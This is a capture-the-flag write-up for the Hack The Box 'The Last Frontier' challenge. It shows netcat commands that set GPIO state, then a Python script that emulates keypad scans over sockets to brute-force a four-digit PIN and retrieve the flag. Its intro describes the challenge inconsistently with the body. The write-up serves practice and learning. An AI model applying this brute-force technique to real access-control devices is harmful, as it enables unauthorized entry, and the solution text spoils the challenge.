HackTheBox The Last Frontier Writeup
Explore the basics of cybersecurity in the The Last Frontier Challenge on Hack The Box. This hard-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
Connect with nc and Setup the gpio
1
2
3
4
5
6
#cmd> comm-module-id
#id> 35
#Module ID set to 35
#cmd> GPIO
#set> 1 0
#GPIO-1 set to: 0
Disconnect and After
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import socket
import time
import sys
if len(sys.argv) < 2:
print(f"Usage: python {sys.argv[0]} <ip:port1,port2>")
sys.exit(1)
host, ports_str = sys.argv[1].split(':')
ports = [int(port) for port in ports_str.split(',')]
key_presses = '5254#'
current_key_to_send = 0
keymap = {
'1': ['E0', '0E'], '2': ['D0', '0E'], '3': ['B0', '0E'], 'A': ['70', '0E'],
'4': ['E0', '0D'], '5': ['D0', '0D'], '6': ['B0', '0D'], 'B': ['70', '0D'],
'7': ['E0', '0B'], '8': ['D0', '0B'], '9': ['B0', '0B'], 'C': ['70', '0B'],
'*': ['E0', '07'], '0': ['D0', '07'], '#': ['B0', '07'], 'D': ['70', '07']
}
def interact_with_nc(sock_nc):
sock_nc.sendall(b"system\n")
time.sleep(0.5)
response = sock_nc.recv(4096).decode('utf-8')
print("Received from NC server:", response)
return 'HTB{' in response
def simulate_keypad_read(command):
global current_key_to_send
if command == 'F0':
key = key_presses[current_key_to_send]
return keymap[key][0] + '\n'
elif command == '0F':
key = key_presses[current_key_to_send]
current_key_to_send += 1
return keymap[key][1] + '\n'
else:
return 'FF\n'
def run_client(server_host, server_port):
global key_presses, current_key_to_send
sock_nc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_nc.connect((host, ports[0]))
print("Connected to NC server.")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((server_host, server_port))
print("Connected to server")
for pin in range(5000, 5254):
key_presses = f"{pin:04d}#"
print(key_presses)
current_key_to_send = 0
while True:
data = sock.recv(1024).decode('utf-8').strip()
if not data:
print("Server closed the connection")
break
print(f"Received from server: {data}")
response = simulate_keypad_read(data)
if response:
sock.sendall(response.encode('utf-8'))
if len(key_presses) == current_key_to_send:
break
if data == 'quit':
print("Quit command received")
break
interact_with_nc(sock_nc)
if __name__ == "__main__":
run_client(host, ports[1])
Wait for the pin to be bruteforced and it will reveal the flag
Summary
The The Last Frontier Challenge on Hack The Box is a hard-level challenge that focuses on advanced hardware manipulation and network communication. Participants configure GPIO settings via command-line, utilize socket programming to automate network interactions, and conduct a brute-force attack to decode a PIN. This challenge effectively combines hardware control with practical cybersecurity techniques.
This post is licensed under CC BY 4.0 by the author.